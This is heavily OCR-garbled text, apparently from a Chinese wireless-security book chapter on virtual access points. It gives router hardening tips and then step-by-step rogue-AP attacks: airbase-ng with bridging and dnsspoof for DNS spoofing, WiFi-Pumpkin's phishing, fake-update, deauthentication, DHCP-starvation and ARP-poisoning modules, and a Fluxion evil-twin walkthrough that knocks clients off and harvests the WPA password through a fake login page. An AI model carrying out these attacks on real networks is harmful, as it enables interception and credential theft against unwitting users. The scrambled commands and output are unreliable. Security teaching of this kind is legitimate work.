因为 当前 大 部 分 的 密码 都 是 黑客 通过 WPS 
漏洞 ， 找 出 PIN 码 来 暴力 破解 的 。 由 于 这 
个 漏洞 ， 无 论 用 户 的 无 线 密码 有 多 长 多 复 
杂 ， 通 过 PIN 码 都 可 以 破解 。 

(10) 关闭 UPnP， 对 于 那些 无 用 的 服 
务 ， 建 议 用 户 直接 关 掉 。 

(11) 关闭 无 线 中 继 / 桥接 功能 (WDS) 。 
如 果 发 现 被 无 故 开 启 ， 说 明 这 台 路 由 器 很 
有 可 能 已 经 被 黑客 控制 了 。 

(12) 关闭 SSD 广播 ， 关 闭 之 后 ， 大 
部 分 人 会 搜索 不 到 路 由 器 设备 ， 这 样 就 可 
以 自己 独 享 网 络 了 这 在 一 定 程度 上 起 到 了 
隐身 作用 。 
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(13) 开启 防 DDoS 功 能 。 这 是 因为 黑 
客 会 通过 DDoS 流 量 进行 攻击 ，10s 左 右 ， 用 
尸 的 路 由 器 就 会 日 动 将 大 部 分 人 踢 下 线 ， 
还 会 出 现 抖 动 状态 。 

(14) 开局 用 户 隔 离 功 能 。 这 样 即 便 
密码 被 破解 ， 黑 客 也 没 法 搜索 到 设备 ， 这 
是 因为 黑客 与 用 户 不 在 同一 个 局 域 网 内 。 
这 对 保护 局 域 网 的 安全 非常 有 用 。 

(15) 采用 增强 认证 。 采 用 8021x 或 者 
Web 认 证 来 进行 账户 和 密码 登录 ， 这 在 一 定 
程度 上 提高 了 无 线 网 络 的 安全 性 。 


手动 创建 AP 


对 于 虚拟 AP 的 创建 ， 用 户 可 以 采用 手 
动 来 人 创建， 下面 介绍 在 Windows 与 Linux 两 
种 系统 下 手动 创建 AP 的 方法 。 


9.2 


防水 汝 9.2.1 在 Windows10 系 统 下 创建 AP 


Windows10 系 统 自 带 了 设置 网 络 共享 


“的 功能 ， 可 以 通过 以 下 步骤 设置 一 个 虚拟 


AP。 具 体操 作 步 又 如 下 : 

右 击 呆 面 上 的 “开始 ”按钮 ， 在 弹出 
rg igre pn 
下 图 所 示 。 


文 镍 许 要 管理 各 (6) 


捍 索 (9) 


运行 (R) 


关机 或 注 钨 [U) 


打开 “运行 ”对 话 框 ， 在 其 中 输入 
ee 
所 示 。 


单 击 “确定 按钮 ， 如 下 图 


可 Windows 将 根据 你 所 输入 的 和 名称 ， 为 你 打开 柜 应 的 程序 . 
文件 夫 、 文 栏 或 Internet 资源 。 


昌 使 用 管理 权限 创建 此 任务 。 


取消 浏览 (B).- 
打开 “命令 提示 符 ” 窗口 ， 在 其 中 答 
ee wlan show drivers 命 令 ， 检 查 无 线 网 


卡 是 否 支 持 AP 功 能 ， 如 果 有 “支持 的 承载 
网 络 : 是 ”人 信息， 证明 具有 AP 功能 ， 如 下 
图 所 示 。 


使 用 netsh wlan set hostednetwork 
mode=allow ssld=WI1IFI1 key=12345678 命 令 
创建 一 个 无 线 AP， 该 命令 用 于 创建 一 个 名 
称 为 WiFi、 连 接 黎 码 为 12345678 的 无 线 网 
络 ， 如 下 图 所 示 。 


| 1 SeT host 已 dnetwork mode=al 1| 癌 谎 SS] C = Fe 1 f 


使 用 netsh wlan start hostednetwork 命 令 ， 


启用 创建 好 的 无 线 网 络 ， 如 下 图 所 示 。 
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打开 “设置 ”对 话 框 ， 在 其 中 选择 
“网 络 和 Internet” 和 选项， 如 下 图 所 示 。 
系统 


最 示 器 、 声 音 、 通 知 、 串 源 


网 络 和 Internet 
WLAN、 飞 行人 模式 、VPN 


个 性 化 
背景 、 钢 屏 、 颜 色 


帐户 
你 的 帐户 、 电 子 邮 件 、 同 步 设 
置 、 工 作 、 其 他 人 员 


应 用 
和 卸载、 默认 应 用 、 可 选 功能 


时 间 和 语言 


OO 
语音 、 区 域 、 日 期 游戏 栏 、 抚 获 、 广 播 、 游 戏 模式 


打开 “网 络 状 态 ” 对 话 框 ， 单 击 左下 
方 的 “网 络 和 共享 中 心 ” 超 链接 ， 如 下 图 
所 示 。 


网 络 疑难 解答 
诊断 并 解决 网 络 问题 。 


查看 网 络 属性 
Windows 防火 墙 


网络 和 共 字 中 心 


网 络 蝇 置 


Be 国 打开 “网 络 和 共享 中 心 ”对 话 框 ， 音 
如 下 图 所 示 。 


控制 面板 主页 


更 改 适 配 钱 议 直 


更 改 高 级 共享 设置 
媒体 流 式 处 翰 先 项 


打开 “网 络 连接 ”对 话 框 ， 在 其 中 可 
以 看 到 多 出 来 的 “本 地 连接 *3” 图 标 ， 如 
下 图 所 示 。 
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™ | VMware Network Adapter 
”VMnet8 
哪 > 已 启用 


未 连接 
- 明 802.11n USB Wireless LAN Card 
以 太 网 2 
网 络 , 共享 的 
条 Reakek pCle GBE Family Contr... 


及 :， ue 


| Microsoft Hosted Network Vir... 


[step 轩 选择 接 入 外 网 的 网 络 图 标 ， 这 里 以 
“以 太 网 2” 有 线 网 络 为 例 演示 ， 选 中 以 太 
网 2 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “ 属 
性 ”菜单 命令 ， 如 下 图 所 示 。 
息 禁用 (8) 
状态 (U) 
诊断 ( 
罗 桥接 (G) 


创建 快捷 方式 (S) 
四 浏 丛 (D) 
昌 重 命名 (M) 


多 层 性 (R) N 


打开 “属性 ”对 话 框 ， 切 换 到 “ 共 
享 ” 选 项 卡 ， 在 “家 庭 网 络 连 接 ” 下 拉 列 
表 中 找到 “本 地 连接 *3” 并 选中 ， 如 下 图 
所 示 。 


VirtualBox Host-Only Network 
VirtualBox Host-Only Network #2 
VMware Network Adapter VIMnet1 
VMware Network Adapter VMnet8 
WLAN 


选择 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 这 
样 便 可 以 创建 一 个 虚拟 AP， 如 下 图 所 示 。 


网 络 共享 


Internet 连 彼 共享 


回 爷 秆 其 他 网 络 用 户 通过 比 计算 机 的 Internet 连接 来 连接 (N) 


家 庭 网 络 连 接 (H): 
本 地 法 缔 ' 3 要 


回 罗 诈 其 他 网 络 用 户 近 制 或 芋 用 共享 的 Internet 连接 (O) 


设置 (G).. 
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油 9. 2.2 在 Kali Linux 系 统 下 创建 AP 
虚拟 AP 最 直接 的 方法 就 是 手动 虚拟 


”AP 地址 ， 手 动 配置 虚拟 AP 的 具体 操作 步 


又 如 下 : 
通过 airbase-ng -c 1 -e Test-002 
便 可 以 虚拟 一 个 AP， 如 下 


wlan0mon 命 令 ， 


图 所 示 。 


root@kali:~# airbase-ng -C 1 -e Test-002 WwWLangmon 

04:55:40 Created tap interface atg 

94:55:40 Trying to set MTU on atg9g to 1500 

04:55:40 Trying to set MTU on wlanQmon to 1800 

04:55:40 Access Point with 8SSID E8:4E:06:28:AE:46 started. 


通过 ifconfig -a 命令 可 以 看 到 多 出 一 块 
at0 的 网 卡 ， 如 下 图 所 示 。 


root@kali:;~# ifconfig -a 
at9: flags=4098<BROADCAST,MULTICAST> mtu 1509 
ether e8:4e:06:28:ae:46 txqueuelen 1990 [Ethernet) 
RX packets © bytes 9 (0.8 B) 
RX errors © dropped 9 overruns 9 frame 9 
TX packets © bytes 9 (0.0 6) 
TX errors 0 dropped 0 overruns © carrier 0 collisions 0 


通过 airodump-ng wlan0mon 命 令 监 
ea 附近 AP， 可 以 看 到 已 经 有 Test-002 这 样 
一 个 AP， 并 且 此 时 处 于 OPN 状 态 ， 如 下 图 
所 示 。 


cH 5 ][ Elapsed: 6 s ][ 2918-19-26 95:62 


BSSID PWR Beacons #Data, #/5 


门 
工 
又 
中 


ENC CIPHER AUTH ES5SID 


B86;88;5E;0A;1B;91 -53 
E4:68:A3:7C:B1:B2 -36 


日 13B OPN 智 铺 硅 电 
54e. OPN CMCC-X] 
Sde, WPA2 CCMP MGT CMCC 


-1 OPN <length: 9> 


E4:68:A3:7C:B1:BB -37 
E4:68:A3:7C:45:F2 -45 


和 了 有 
ODOO=-hboOD 
ODOoODoOo 和 Do 
PomNomm. 

一 

己 

nn 


F4:83:CD:33:66:73 -1 WPA2 CCMP “PSK 于 从 科技 
E4:68:h3:;7C:B1:B5 -365 54e, OPN 入 
E8:4E:66:28:AE:46 9 13 54 OPN Test-802 
B6:83;CD:33:;60:;73 -5 485 OPN TPGuest 6073 


1C:FA:68:901:2F:98 -23 139 WPA2 CCMP PSK _ Test-991 


(多 提示 : 可 以 使 用 airbase-ng -a < 真实 AP- 
MAC 地 址 > --essid < 真实 AP 的 名 称 > wlan- 
0mon 命 令 ， 完 全 模仿 一 个 真实 AP， 此 时 进 
行 监听 便 不 能 区 分 真实 AP 与 伪 AP， 如 果 伪 
AP 再 增 大 发 射频 率 便 会 履 盖 上 真实 AP。 


使 用 apt-get install bridge-utils 命 令 ， 
安装 一 个 网 桥 工 具 ， 如 下 图 所 示 。 


root@kali:-# apt-get insftaLLU bridge-utils 
在 读 取 软件 包 列 表 ... 完成 
在 分 析 软件 包 的 依 娄 关 系 树 
在 读 取 状态 信息 ... 完成 
列 软 件 包 是 自动 安装 的 井 且 现在 不 需要 了 : 
libx265-168 python-backports.ssl-match-hostname python-beautifulsoup 
ruby-terminal-table ruby-unicode-display-width 

使 用 'apt autoremove' 来 哮 划 它 (它们 )， 

下列 【新 】 软件 包 将 被 安装 : 

bridge-utils 

峙 级 了 9 个 软件 包 ， 新 安装 了 1 个 软件 包 ,， 受 趣 载 8 个 软件 包 ， 有 98 个 软件 包 未 被 升级 。 


使 用 brctl addbr bridge 命 令 ， 添 加 一 
个 桥接 接口 ， 并 使 用 ifconfig -a 命令 查看 
接口 ， 如 下 图 所 示 ， 添 加 一 个 新 的 桥接 
接口 。 
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FootgKkali:~# 1TCONTIg -a 
bridge: flags=4098<BROADCAST,MULTICAST> mtu 1560 
ether fa:ea:10:81:db:11 txqueuelen 1006 (Ethernet) 
RX packets 9 bytes 9 (686.0 B) 
RX errors © dropped 0 overruns © frame 0 
TX packets D bytes 9 (686.0 B) 
TX errors 9 dropped 0 overruns © carrier 9 collisions 0 


执行 brctl addif bridge eth0 命 令 和 brctl 
addif bridge at0 命 令 ， 将 eth0 网 卡 和 at0 网 
卡 加 入 到 桥接 中 ， 分 别 将 其 IP 地 址 配置 为 
0.0.0.0 并 局 动 起 来 ， 如 下 图 所 示 。 


root@kali:-# brctl addif bridge etho 
root@kali:~# brctl addif bridge atg9 

root@kali:~# Ifconfig ethg 0.0.0.0 up 
root@kali:~# ifconfig at9 0.0.0.0 up 


执行 ifconfig bridge <ip 地 址 > up 命 
令 ， 将 桥接 网 口 启动 ， 如 下 图 所 示 ， 这 里 
的 JP 地 址 根据 自己 的 网 络 进行 设置 ， 设 置 的 
是 192.168.1S7.100。 


root@kali:~# ifconfig 

at9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 

jinets fe8g: :ead4e:6ff'fe28:ae46 prefixlen 64 scopeid 9x20<Link> 
ether e8:4e:96:28:ae;46 txqueuelen 1g68 【Ethernet) 

RX packets 8 bytes 0 (86.8 B) 

RX errors 8 dropped © overruns 9 frame 0 

TX packets 58 bytes 13118 (12.8 KiB) 

TX errors B dropped 9 overruns 6 carrier 9 collisions 日 


bridge: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1588 
inet 192.158.157.199 netmask 255.255.255,9 broadcast 192.168,157.255 
Inet6 fe860: :29c:29ff:fe39:f29c prefixlen 64 scopeid 9x20<LInk> 
ether 60:0c:29:39:f2:9¢ txqueuelen 1068 [Ethernet) 
RX packets 48 bytes 11434 (11.1 KiB) 
RX errors B dropped 9 overruns 9 frame 9 
TX packets 19 bytes 796 (796.0 B) 
TX errors 8 dropped © overruns @ carrier © collisions 0 


使 用 route add -net 0.0.0.0 netmask 
0.0.0 gw 192.168.1.1 命 令 ， 主 机 添加 一 个 
网 关 ， 并 使 用 netstat -nI 命 令 查 看 网 关 添 加 
情况 ， 如 下 图 所 示 。 


root@kali:-# netstat -nr 

Kernel IP routing table 

Destination Gateway Genmask Flags MSS Window irtt Iface 
8.0.80.0 192.168.1.1 8.0.0.8 UG 日 日 a ethe 
6.0.0.0 192.168.1.1 8.0.0.8 UG 9 a eth9 
192.168.1.8 B.0.90.8 255.255.255.8 U 9 B g eth9 
192.168.157.,0 0.0.0.0 255.255 .255.8 U 9 6 a bridge 


使 用 echo 1 > /proc/sys/net/ipv4/ip 
le 添加 IP 地 址 转发 功能 ， 如 下 
图 所 示 。 


root@kali:-# cat /proc/sys/net/ipv4/ip forward 

0 

root@kali:-# echo 1 > /proc/sys/net/ipv4/ip forward 
root@kali:-~# cat /proc/sys/net/ipv4/ip forward 

1 


[step 图 新 建 一 个 文件 ， 文 件 格 式 为 : 
ws 如 下 图 所 示 。 


文件 (F) ”编辑 (E) 查看 (V) 搜索 (9) 
127.0.0.1 www.baidu.conm 


IP 地 址 


使 用 dnsspoof -i bridge -f hosts 命 令 ， 


将 文件 中 的 人 P 域 名 对 应 关系 进行 解析 ， 如 下 
图 所 示 。 下 图 中 可 以 看 到 ， 在 本 机 开启 了 
53 端 口 进行 DNS 解 析 ， 而 解析 的 规则 则 是 
按照 之 前 做 好 的 配置 文件 来 进行 。 


root@kali:~# dnsspoof -i bridge -f hosts 
dnsspoof: listening on bridge [udp dst port 53 and not src 192.168.157.100] 


9.3 ”使 用 WiFi-Pumpkin 虚 
拟 AP 


WiFi-Pumpkin 是 一 款 图 形 化 工具 ， 它 
并 不 是 Kali 目 带 的 工具 ， 通 过 它 可 以 轻松 实 
现 虚 拟 AP、 移 动 WiFi 等 功能 。 


9.3.1 安装 WiFi-Pumpkin 


由 于 WiFi-Pumpkin 是 扩展 工具 ， 因 此 

需要 下 载 。 下 载 并 安装 WiFi-Pumpkin 工 具 
的 操作 步骤 如 下 : 
使 用 git clone https://github.com/ 
POcL4bs/WiFi-Pumpkin.git 命 令 ， 从 github 上 
复制 代码 到 本 机 ， 或 者 直接 从 github 上 下 载 
安装 包 ， 如 下 图 所 示 。 


Find file 


Clone or downioad 


Clone with HTTPS GO) 
Use Git or checkout with SVN using the web URL. 


https://github,.com/POcLAbs/WiFi-Pumpkin.; 廊 


Open in Desktop Download ZIP 


单 击 Download ZIP 按 钮 ， 可 以 下 载 安 
装 包 。 下 图 为 下 载 后 的 安装 包 。 


WiFi-Pumpkin- 
master.zip 


WiFi-Pumpkin- 
master 


[step 图 解压 安装 包 后 查看 安装 包 文 件 ， 如 
平 所 示 。 至 此 便 完 成 了 WiFi-Pumpkin 的 
下 载 。 
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rootEékali:~/UownLoads/WiFi- Fumpkin-master# TS 
HANGELOG installer.sh modules 
ONTRIBUTING .md ISSUE TEMPLATE.md plugins 
core LICENSE README .md 
ocs logs 

icons make deb.sh 


使 用 ./installer.sh --install 命 令 安 装 软 
本 运行 效果 如 下 图 所 示 。 


wifi-pumpkin 
wifi-pumpkin.deskto 
Wifi-pumpkin.py 
requirements ,txt 

templates 


Version: 0.8.5 
usage: ./installer. sh --install | --uninstall 
命中 :1 http://mirrors.neusoft.edu.cn/kali kali-rolling IrReleasa | 
正在 读 取 软件 包 列 表 ... 完成 
正在 读 取 软件 包 列 表 ... 完成 

在 分 析 软 件 包 的 依 闽 关系 树 
在 读 取 状态 信息 ... 完成 
人 Libffi-dev 已 经 是 最 新 版 (3.2.1-8). 
Libffi-dev 已 设置 为 手动 安装 。 
python-pip 已 经 是 最 新 版 (9.9.1-2.3)。 
python-pip 已 设置 为 手动 安装 。 


安装 过 程 WiFi-Pumpkin 会 自动 查看 依 
pr hb 
载 并 安装 相关 的 依赖 包 ， 如 下 图 所 示 。 


耶 会 同时 安装 下 列 软 件 : 
girl.2-harfbuzz-0.0 icu-devtools libglib2.0-dev libglib2.6-dev-bin 
libgraphite2-dev Libharfbuzz-dev Libharfbuzz-gobjecte Libicu-dev 


libicu-le-hb-dev Libpcrel6-3 libpcre3-dev libpcre32-3 LibpcrecppobVv5 
pkg-config 

峙 议 安装 : 

libglib2.0-doc libgraphite2-utils icu-doc libssl-doc 

下 列 【 新 】 软 件 包 将 被 安装 : 

girl.2-harfbuzz-60.9 icu-devtools Libgtib2.9-dev libglib2.6-dev-bin 
Libgraphite2-dev Libharfbuzz-dev Libharfbuzz-gobjecte Libicu-dev 
Libicu-Le-hb-dev Libpcre16-3 libpcre3-dev Libpcre32-3 libpcrecppevs 
libssl-dev libxml2-dev libxsltl-dev pkg-config zlLip19-dev 


安装 完成 后 的 结果 如 下 图 所 示 ， 这 里 
给 出 了 相应 的 提示 。 


[=] checking dependencies 
上 ---[v]----[+] hostapd Installed 


[=] Install WiFi-Pumpkin 

[v] binary::/usr/bin/ 

[~v] wifi-pumpkin installed with success 
[v] execute sudo wifi-pumpkin in terminal 
[+] POcL4bs Team CopyRight 2015-2617 
[+] Enjoy 


9.3.2 ”开始 虚拟 AP 


WiFi-Pumpkin 配 置 完 成 后 ， 下 面 束 可 
以 虚拟 AP 了 。 上 有 具体 的 操作 步骤 如 下 : 
单 击 Settings 选 项 卡 可 以 切换 到 设置 
页 面 ， 如 果 创 建 一 个 虚拟 AP 可 以 通过 设置 
Access Point 来 完成 ， 填 入 SSID 的 名 称 、 
BSSID 的 MAC 地 址 (这 里 可 以 随机 也 可 
以 自行 设置 ) 、AP 信 道 、 无 线 网 卡 ( 可 
以 通过 Refresh 按 钮 来 刷新 获取 ) ， 如 下 图 
所 示 。 
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下 方 可 以 设置 DHCP 服 务 ， 分 配 IP 
地 址 段 、 网 关 等 选项 ， 设 置 完成 后 可 单 击 
下 方 的 save settings 按 钮 ， 如 下 图 所 示 。 


此 时 的 WiFi-Pumpkin 是 一 个 未 运行 状 
态 ， 如 下 图 所 示 。 


[step 加 当 所 有 都 设置 完成 后 ， 直 接 单 
击 start 按 钮 局 动 WiFi-Pumpki， 如 下 图 
所 示 。 


实现 数据 监听 ， 此 时 WiFi 列 表 中 会 
多 出 一 个 刚才 设置 的 无 线 ESSID， 使 用 手 
机 接 入 ， 浏 览 网 页 的 数据 可 以 通过 WiFi- 
Pumpkin 查 看 ， 如 下 图 所 示 ， 这 样 便 可 以 抓 
取 流 经 AP 的 所 有 数据 包 。 


w [100020>113 142 80 


如 果 需 要 使 用 移动 WiFi， 在 Setting 界 面 
中 选中 Enable Wireless Security 选 项 。 这 里 
可 以 选择 加 密 方式 以 及 共享 密 钥 ， 如 下 图 
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9.3.3 WiFi-Pumpkin 的 其 他 工具 


在 Tools 菜 单列 表 下 有 一 个 ActiveDrift- 
Net 工 具 。 用 于 得 看 连接 设备 传输 过 程 中 的 
图 片 信息 ， 如 下 图 所 示 。 


下 图 为 ActiveDriftNet 抓 取 的 图 片 
信息 。 


driftnet 口 


另外 ， 在 Image-Cap 中 也 可 以 抓 取 图片 
信息 ， 如 下 图 所 示 。 


Server 菜 单 中 有 两 个 选项 ， 一 个 是 
Phishing Manager， 一 个 是 Windows Up- 


date， 如 下 图 所 示 。 


其 中 Phishing Manager 可 以 用 于 模拟 一 
个 网 页 ， 可 以 从 这 里 虚假 页 面 达 到 钓鱼 效 
宋 ， 如 下 图 所 示 。 


Phishing Manager © O00 


© 


Windows Update 则 模拟 一 个 类 似 Win- 
dows 更 新 程序 或 Java 更 新 程序 ， 回 客户 端 发 
送 数据 包 ， 如 下 图 所 示 。 


Windows Update Attack Generator @ 日 四 


Modules 菜 单 中 包括 五 个 模块 ， 它 们 分 
别 是 WiFi deauthentication (用户 断 开 客 户 端 
与 AP 连接 ) 、WiFi Probe Request (用 于 发 
现 AP) 、DHCP Starvation (实现 DHCP 饥 饿 
攻击 ) 、ARP Poisoner (实现 ARP 攻 击 ) 以 
及 DNS spoofer〔( 实 现 DNS 其 骗 ) ， 如 下 
所 示 。 


第 9 章 ”无 线 网 络 中 的 虚拟 AP 技术 一 全 


e WiFi deauthentication: 这 里 可 以 选 
择 一 个 目标 AP 通过 发 送 断 开 连 接 请 
求 ， 中 断 STA 与 AP 的 连接 ， 从 而 抓 
取 握 手 信 息 ， 如 下 图 所 示 。 


Wireless Deauthentication Attack © 由 四 


e@ WiFi Probe Request: 用 于 发 现 AP， 
通过 该 模块 可 以 扫 拉 附近 的 AP， 如 
下 图 所 示 。 


Probe Request wifi Monitor 后 日 日 


e DHCP Starvation: 用 于 实现 DHCP 饥 
饿 攻击 ， 一 有 旦 启动 迅速 占 满 DHCP 
所 分 配 的 卫 ， 如 下 图 所 示 。 


Dhcp Starvation Attack @©@@@ 
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e ARP Poisoner: 可 以 扫描 网 段 中 密码， 从 而 获取 无 线 密 码 。 使 用 Fluxion 工 
的 客户 机 ， 通 过 模拟 实现 ARP 攻 具 虚 拟 AP 的 操作 步骤 如 下 : 


击 ， 如 下 图 所 示 。 使 用 git clone https://github.com/w1i-fi- 
ARP Poisoner ©00 analyzer/fluxion.git 命 令 ， 从 github 上 复制 代 


码 到 本 机 ， 或 者 直接 从 github 上 下 载 安装 


包 ,， 如 下 图 所 示 D 


Clone with HTTPS GO) 
Use Grt or checkout with SVN using the web URL. 


https://github.com/wi-fi-analyzer/fluxiol | 鲜 


Open in Desktop Download ZIP 


解压 安装 包 ， 查 看 安装 目录 文件 ， 如 


下 图 所 示 。 
e DNS Spoofer: 可 以 实现 DNS 欺骗 ， 
root@kali:~/Downloads/fluxion-master# ls 


其 中 吕 以 设置 需 要 其 骗 的 域 六 9 docs install Lib LogosS siteinstaller.p 


a _ _ _ fluxion.sh language locale README.md sites 
配合 Phishing Manager 与 Windows 


Update 构 建 虚 假 页 面 或 者 更 新 程 执行 “./fluxion.s”h 脚 本 ， 检 查 数 据 


序 ， 如 下 图 所 示 。 依赖 包 信 息 ， 如 下 图 所 7 "og 

DNS Spoofer © [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ] 
[ ] 
[ FLUXION 2 < Fluxion Is The Future > ] 
[ | 
[~~~~~ ~~~~~~ ~ ~ ~ ~~~】 
rerneK=nge OK ! 
Bireplay-ng..... OK ! 
Airmon-ng....... OK! 
airodump-ng..... OK ! 
I OK ! 
[| 国 民有 全 OK 1! 
1 OK ! 
1 1 OK! 
on OoK! 
Lin Ends oa Not installed 
macchanger...... OK ! 
网 站 本 汪汪 OK ! 
1 OK! 
1 el | Not installed 
OT oOoK! 
pythnonies ea aed OK ! 
EL OK! 
KEeETov sri ioeodn OK ! 
ODEnasllLes oa OK ! 
i OK ! 
区 七 人 了 站 加 二 二 OK ! 
四 本本 天 OK 


Fluxion 不 是 Kali 目 带 的 工具 ， 通 过 它 可 切换 到 install 列 表 中 ， 执 行 ./fluxion.s 
以 虚拟 一 个 AP， 以 便 诱 惑 客 户 端 输入 登录 命令， 安装 Fluxion 软 件 ， 如 下 图 所 示 。 


1>2 


Alrcrack-ng..... 
Aireplay-ng..... 
Airodump-ng..... 
ee 
ee 
人 
1 
EigMEEDU ee 
ei 和 


Openss\ suassesess 


员 ,全 轩 轩 (ep 
| | rk lo PS 
;| 


|. 


再 次 执行 “./fluxion.s”h 脚 本， 进入 
py- 在 这 里 可 以 选择 语言 ， 如 下 图 所 
由 于 该 软件 字体 颜色 偏 白色 所 以 更 换 
为 黑 揪 白字 。 


— 
yq、 9 


FLUXION 2 < Fluxion Is The Future > 


2] Select your language 


[1] 
[2] 
[3] 
[4] 
[5] 
[6] 
[7] 


EngLish 
German 
Romanian 
Turkish 
Spanish 
Chinese 
Italian 
[8] Czech 
[9] Greek 
[10] French 
[11] Slovenian 


@fluxion]-[~] 


选择 1 使 用 英语 ， 进 入 信道 选择 ， 如 
人 搜索 通信 人 信道， 如果 已 知 目标 
的 通信 信道 可 选择 2 指定 信道 ， 不 然 
1 全 信道 搜索 。 搜 索 过 程 中 会 打开 一 
口 ， 当 扫描 到 所 雪 需 的 WIFI 信 己 ， 按 Ctrl + C 
键 停止 扫描 ， 建 议 扫描 至 少 30s 以 上 。 


全 选择 
个 窗 


FLUXION 2 < Fluxion Is The Future > 


[2] Select channel 


[1] ALL channels 
[2] Specific channel(s) 
[3] Back 


@fluxion]-[~] 
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搜索 到 目标 AP 后 可 以 暂停 ， 
人 通过 数字 选择 目标 AP。 


如 下 图 


CHAN 


SECU 


有 IEC 


= = 
Loli"NEL =- 


We rE 


选择 完 AP 后 可 以 进入 虚拟 AP 界面 ， 
如 下 图 所 示 ， 这 里 推荐 使 用 第 1 选项 。 


= Test-BOl1 / WPA2 
lel = 6 
ed = 70 Mbps 

D = 1C:FA:68:01:2F:08 (TP-LINK TECHNOLOGIES C0., ,LTD. 


[2] Select Attack Option 
[1) FakeAP - 


[2] FakeAP - 
[3] Back 


Hostapd (Recommended) 
airbase-ng (Slower connection) 


GfLuxion] - [~] 


step 图 提示 虚拟 AP 信息 以 及 保存 文件 路 
径 ， 如 下 图 所 示 ， 可 以 直接 按 Enter 键 。 


D = Test-B01 / WPA2 
LL 中 
= 76 Mbps 


D = 1C:FA:68:61;:2F:68 [TP-LINK TECHNOLOGIES C0.,LTD. 


andshake Location 
ress ENTER to Skip 


(Example: /root/Downloads/fluxion-master.cap) 


抓 取 握手 信息 ， 
rp 2 项 都 可 以 。 


[2)】 Handshake check 


nr 下 图 所 示 。 使 用 第 


[1] pyrit 
[2] aircrack-ng (Miss chance) 
[3] Back 


GfLuxion]-[~] 国 


step 贺 选择 第 1 项 ， 会 启动 拒绝 请 求 页 面 ， 
如 下 图 所 示 。 


[2] *Capture Handshake* 


Deauth all 

Deauth all [mdk3] 
Deauth target 
Rescan networks 
Exit 


[1] 


[2] 
[3] 
[4] 
[5] 


[step 轿 选择 第 1 项 ， 中 断 所 有 与 AP 连接 的 客 
re ep leon 
握手 信息 ， 如 下 图 所 示 。 


S| 
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Capturing data on channel --> 1 ©@ OO a 全 要 来 仑 他 | 建 一 一 个 Web 页 1 面 ， 如 下 
CH 1 ][ Elapsed: 30 s ][ 2018-11-04 03:57 ][ WPA handshake: 1C;Fh:68:01:2F:08 图 四 示 。 这 个 页 面 是 用 于 诱骗 客 尸 端 输入 


BS51D PWR RXQ Beacons #lata, #/s CH MB ENC CIPHER AUTH ESSI a= 人 L 
登 录 个 三 ER Oo 
1C:FA:B8:01:2F:08 0 78 170 11 0 1 270 WPA2 CCMP PSk Test 


BSSID STATION PWR Rate Lost Frames Probe 


SsSID = Test-961 / WPA2 
UL = 1】 
= 76 Mbps 
= 1C:FA:68:61:2F:Q8 [TP-LINK TECHNOLOGIES C0.,LTD. 


1CL:FA:68:01:2F:08 DC:6D:CD:b6:FE:CB 0 le- le 392 bl Test-001 


抓 取 到 握手 信息 后 ，Fluxion 界 面 如 下 
ee 所 示 o 1 先 择 身 第 ] 项 、 检查 握手 信息 WE EE OUT Oon 


[1] Web Interface 
[2] Exit 


选择 伪造 页 面 的 语言 ， 如 下 图 所 示 。 


[2] *Capture Handshake* 


Status handshake: 


D = Test-801 / WPA2 
= 1 
= 76 Mbps 
= 1C:FA:68:01:2F:08 [TP-LINK TECHNOLOGIES C0.,LTD. 


[1] Check handshake 

[2] Back 

[3] Select another network 
[4] Exit 

#> | | 


[2] Select Login Page 
[1] English [ENG] (NEUTRA) 


[2] German [GER] (NEUTRA) 
[3] Russian [RUS] (NEUTRA) 


验证 通过 后 会 跳 转 到 创建 证 书 界面 ， ee se ee 
本 _ 、 [6] Portuguese [PDOR] (NEUTRA) 
如 下 图 所 示 。 选择 第 1 项 创 | 建 一 个 SSL 证 书 [7] Chinese (NEUTRAI 
选择 语言 后 ，Fluxion 会 构建 一 个 虚拟 
AP 并 且 将 客户 端 连接 中 断 ， 虚 拟 AP 是 没有 
[1] Create a SSL _ certificate 3 
[2] Search for SS\ certificate 深 码 连接 的 ， 此 时 Fluxion 会 开启 多 个 省 "DD 


Ss 用 于 检测 用 户 接 入 状态 ， 如 下 图 所 示 。 


Certificate invalid or not present, please choice 


+ Test-001 
.+ 1C:FAS PASO 2:06 


i ,+1 
[T) 帮助 (H) ,+ TPF-LIMK TECHNOLOGIES CO0。,LD， 


he Future > 二 
CLIENTS DN_INE: 


Documents 

;~# Cd Pictures/ Attack In progress ，， 

:~/Pictures# ls 

:~/Pictures# 品 1) Choose another network 
2) Exit 


ol 


Deauthall [mdk3] Test-001 @© 0 


tecdtbB:Fe:ch RADILG: starting accounting sces3ion 319FIEr4IE 


此 时 手机 登录 会 跳 转 到 一 个 Web 页 面 提示 需要 输入 登录 密码 ， 如 下 图 所 示 。 这 个 密 
码 Fluxion 会 向 真实 的 AP 进 行 验证 ， 输 入 错误 会 提示 错误 ， 直 到 拿 到 真实 密码 。 


出 错 了 : 您 输入 的 密码 错误 ! 


ESSID: Test-001 
BSSID: 1C:FA.68:01:2F:08 
Channel: 1 


为 了 您 的 安全 考量 , 请 输入 WPA 密 登录 到 网 络 
码 以 重新 连接 网 络 


输入 您 的 WPA 室 码 : 


您 的 无 线 网 络 将 会 在 短 时 间 内 恢复 


[step 图 获取 到 真实 密码 ， 如 下 图 所 示 。 


© 


Wifi Information 


[00:00:00] 1/0 keys tested (136.56 k/s) 
Time left: 


由 


YW NSS ER 
由 
| 一 二 
ur rN 
只 厅 熙 各 局 
人 后台 第 品 区 出 
广电 吕 语 
名 信 叶 名 局 2S 
三 
斗 己 员 只 只 急 
网 出 胃 遇 月 轨 司 
SS BBAB HR 
9 间 包 员 吕 对 才 
号 BB 人 SS A# 
区 ”出 肪 喇 瑟 基 久 
怠 叶 月 与 只 与 避 


EAPOL HMRLK 


四 
[== 
一 | 
= 
一 
J 
~ 
DD 


无 线 网 络 入 侵 检 测 系统 


WAIDPS 是 一 款 由 Python 编写 的 无 线 
入 侵 检 测 工 具 ， 基 于 Linux 平 台 并 且 完 全 
开源 。 它 可 以 探测 包括 WEP/WPA/WPS 
在 内 的 无 线 入 侵 与 攻击 方式 ， 并 可 以 收 
集 WiFi 相 关 的 所 有 信息 ， 当 无 线 网 络 中 存 


9.5 


patl | 七: | 
